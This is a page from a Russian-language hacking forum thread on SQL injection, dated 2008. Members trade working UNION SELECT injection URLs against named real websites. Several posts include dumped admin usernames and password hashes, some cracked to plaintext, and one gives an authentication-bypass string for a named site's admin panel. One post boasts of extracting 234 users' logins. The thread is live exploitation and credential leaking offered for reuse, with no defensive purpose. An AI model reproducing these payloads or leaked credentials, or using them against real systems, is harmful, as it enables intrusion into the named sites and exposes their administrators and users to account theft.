FORUMS

MEMBERS

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
SQL Инъекции

Страница 553 из 1602

553

Опции темы

Поиск в этой теме

Опции просмотра

06.06.2008, 01:04

hOd

Новичок

Регистрация: 16.03.2008

Сообщений: 10

Провел на форуме:
55092

Репутация: 25

http://www.horsens-emballage.dk/products.php?id=121+union+select%201,user(),3,4,5

06.06.2008, 01:54

piton

Новичок

Регистрация: 14.09.2006

Сообщений: 17

Провел на форуме:
96999

Репутация: 0

http://doshirak.com/PWE/etc/loader.php?mid='75&mode=local&module=/etc/checkanswer&template=checkanswer.aj

помогите раскрутить и вообще рабочая она ли ?

06.06.2008, 03:18

DDoSька

Постоянный

Регистрация: 05.05.2008

Сообщений: 403

Провел на форуме:
2375039

Репутация: 1160

Отправить сообщение для DDoSька с помощью ICQ

Цитата:

Сообщение от hOd

http://www.horsens-emballage.dk/products.php?id=121+union+select%201,user(),3,4,5

вот так тож можно

http://www.horsens-emballage.dk/products.php?id=121+union+select%201,password,3,4, 5+from+users
------------------------------------------------------------------
admin:6acb8c143d32f46326b37aa2fff1bced

06.06.2008, 02:35

Ponchik

Постоянный

Регистрация: 30.08.2005

Сообщений: 730

Провел на форуме:
6828219

Репутация: 2274

Секс шоп
_http://eroshop.com.ua/?sec=det&id=0'+UNION+SELECT+1,2,concat(login,0x3a, password),4,5,6,7,8,9,10,11,12,13,14+FROM+users/*
Admin:19820429

06.06.2008, 03:09

DDoSька

Постоянный

Регистрация: 05.05.2008

Сообщений: 403

Провел на форуме:
2375039

Репутация: 1160

http://www.paintball.ru/next.php?id=999919+union+select+1,2,concat(USER(), 0x3a,VERSION(),0x3a,DATABASE())
user

aintball_user@localhost
version:5.0.51a-community-log
-------------------------------------------------------------------------------------------------------------------
http://www.paintball.ru/next.php?id=999919+union+select+1,2,concat(login,0 x3a,pass,0x3a)+from+pb_users
+limit+1,1
логины и пароли от 234 пользователей
-------------------------------------------------------------------------------------------------------------------
там еще много чего...

06.06.2008, 05:32

o3,14um

Участник форума

Регистрация: 16.11.2006

Сообщений: 230

Провел на форуме:
599789

Репутация: 227

сайт посвящённый программированию:

Цитата:

http://devoid.com.ua/print.php?id=-1+union+select+1,2,3,4,5,user(),7,8,9,10,11+--+

знаменитый ИСХОДНИКИ.РУ

Цитата:

http://www.ishodniki.ru/art/print.php?cat=1&id=-1+union+select+1,2,3,4,concat_ws(0x3a,username,pas sword),6,7,8,9,10,11,12,13,14,15+from+admin/*

admin:d2811372903d0e598162e5762cd18340db68d846 -> flash15

а вот админку так и не нашёл =(

06.06.2008, 07:12

sabe

Постоянный

Регистрация: 16.03.2007

Сообщений: 380

Провел на форуме:
1404552

Репутация: 568

Отправить сообщение для sabe с помощью ICQ

Отправить сообщение для sabe с помощью AIM

Отправить сообщение для sabe с помощью Yahoo

вот еще интересненькое:

Цитата:

http://www.ishodniki.ru/art/print.php?cat=1&id=-1+union+select+1,2,3,4,concat_ws(0x3a,pwd),6,7,8,9 ,10,11,12,13,14,15+from+_wfspro_admin/*
admin

или

Цитата:

http://www.ishodniki.ru/art/print.php?cat=1&id=-1+union+select+1,2,3,4,concat_ws(0x3a,user,pass),6 ,7,8,9,10,11,12,13,14,15+from+sympoll_auth/*

в антибояне нет

06.06.2008, 11:51

$p01nt

Участник форума

Регистрация: 19.02.2008

Сообщений: 186

Провел на форуме:
584540

Репутация: 96

в антибояне нет

www.kulturflooring.com

Уязвимость в скрипте:

Код:

http://www.kulturflooring.com/index.php?id=1'

Подбор колонок:

Код:

http://www.kulturflooring.com/index.php?id=-1+union+select+1,2,3,4/*

Информация о базе:

Код:

4.0.26
kulturflooring_com
kultur@kulturflooring.com

06.06.2008, 16:03

Nea7

Участник форума

Регистрация: 08.09.2007

Сообщений: 211

Провел на форуме:
5076186

Репутация: 778

Цитата:

Сообщение от $p01nt

www.kulturflooring.com

http://kulturflooring.com/admin/index.php
Username:' or 1=1/*
Password:Nea7

#10

06.06.2008, 23:18

tor4)

Познающий

Регистрация: 27.05.2008

Сообщений: 51

Провел на форуме:
611529

Репутация: 41

http://o-sport.ru/

Цитата:

http://o-sport.ru/top/stats.php?id=89'+union+select+1,version(),3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*

5.0.30-Debian_1-log
Вытащил все че мог я)

admin:508504343ef23ff48724729cd07281e7 =>290486 Если база с хэшей не врет.

Админку не нашел если кто найдет Дайте знать где она.